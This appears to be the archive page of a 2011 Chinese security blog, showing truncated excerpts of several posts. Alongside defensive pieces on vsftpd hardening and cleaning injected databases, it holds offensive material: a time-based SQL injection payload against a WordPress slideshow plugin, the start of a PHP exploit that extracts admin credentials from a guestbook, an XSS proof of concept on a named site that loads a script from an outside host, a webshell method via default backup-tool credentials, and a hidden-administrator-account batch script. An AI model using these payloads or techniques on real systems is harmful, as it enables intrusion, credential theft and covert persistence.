最好的入侵检测linux教程

分类:安全 | 2011-08-31 | 撸过 406 次
0人扯谈

 

一:基本知识
  
  1:常见UNIX版本:
  SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Unix,Unicos,Unix ware...
  2:简单介绍几个
  sunos&solaris SUN本来想用solaris取代sunos,不过在用户的要求下,到目前为止,[......]

继续阅读

Vsftpd安全

分类:技术 | 2011-08-30 | 撸过 404 次
0人扯谈

一、基本设置

1、login banner

[root@station2 ~]# vi /etc/vsftpd/vsftpd.conf

ftpd_banner=Welcome to blah FTP service.

banner_file=/etc/vsftpd/banner

[root@station2 ~]# vi /etc/vsftpd/banner

Hello ,welcome to FTP

#ftpd_banner和banner_file均为ftp登陆信息显示,banner_file优先,有banner_file则显示该文件内容,不显示ftpd_banner信息

2[......]

继续阅读

WordPress插件SH Slideshow

分类:安全 | 2011-08-30 | 撸过 415 次
0人扯谈

标题: WordPress SH Slideshow plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------

缺陷代码分析

---------------

$result = $wpdb->query('delete from sh_slides where id = '.$_POST['id']);

命令行下建立VPN

分类:安全 | 2011-08-30 | 撸过 1,053 次
0人扯谈
@echo off
rem preparation

sc config sharedaccess start= disabled
net stop SharedAccess
sc config remoteaccess start= auto
net start RemoteAccess
net start lanmanserver
net start RemoteRegistry

rem build vpn

netsh ras set user vpnuser permit
netsh ras ip add range 10.10.1.1 10.10.10.10
netsh ras i[......]

继续阅读

ASP构造注入点继续注入

分类:安全 | 2011-08-29 | 撸过 447 次
0人扯谈

首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去

<!--#include file="xx.asp"-->
<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>

把strSQL =[......]

继续阅读

114啦网址导航留言本注入漏洞

分类:安全 | 2011-08-29 | 撸过 1,059 次
1人扯谈

雨林木风的114啦网址导航程序留言文件存在注入漏洞。攻击者利用EXP

可以得到管理员帐号和MD5密码。

版本:<=1.5

EXP如下:

<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
-------------[......]

继续阅读

康盛旗下网站主机网站存在XSS

分类:安全 | 2011-08-29 | 撸过 353 次
0人扯谈

描述:XSS很邪恶~

详细说明:http://www.verydz.com/login.php?goto_page="><script src=http://www.webshell.cc/test.js></script>

帝国备份王(Empirebak)拿webshell

分类:安全 | 2011-08-28 | 撸过 497 次
0人扯谈

帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.

可在 http://www.phome.net/ebak2008os/ 下载到

默认账号密码为
admin 123456

登陆后先备份一次数据

备份时可选择备份到的目录。。默认有个safemod

当然也可以是别的..这里以safemod来说了

备份完毕后来到

管理备份目录

打包并下载

把开始备份到的数据可以先下回分析..当然数据库比较大的话可以省略这一步..因为我之前下载已经分析完毕了

备份后的saf[......]

继续阅读

复制并真正隐藏administrator帐号(完全批处理)

分类:安全 | 2011-08-28 | 撸过 493 次
0人扯谈

网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号。

并复制administrator的权限。

其实这是暂时、一次性隐藏而已,服务器重启一下通过“计算机管理”或者net user

都能看到的。

本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名,

设置密码位12345678(可以自己改一下批处理最后一行)。

这个来复制administrator权限,难以发现与引起怀疑。

(当然其他帐号也可以,用这个帐号主要通过机器名就能知道自己想要的入侵帐号密码是多少)

==================[......]

继续阅读

数据库挂马的解决方法

分类:技术 | 2011-08-28 | 撸过 448 次
0人扯谈

最近流行的数据库挂马的解决方法
前段时间,公司一个主要的网站数据库中个别表的数据经常被修改并挂马,由于网站是以前别人做的,代码有点乱,所以只看了与这几个表相关的文件代码。原因可能是接收参数的时候没有过滤危险字符,于是就加上了接受参数的格式化函数,数据库连接文件中也把接受参数时出现的“;”替换成“;”了。但是过了一天,又被挂马,分号替换没有起到作用。
  于是搜索了一下,发现从3月份开始很多数据库SQL注入挂马的例子,看来这段时间这种挂马手段很流行,并且只是针对Asp+Sql Server的网站,只有你网站代码存在SQL注入的漏洞,就可能会被挂马,而且只针对文本型的字段char/text类似的字[......]

继续阅读

第 1 页,共 14 页12345...10...最旧 »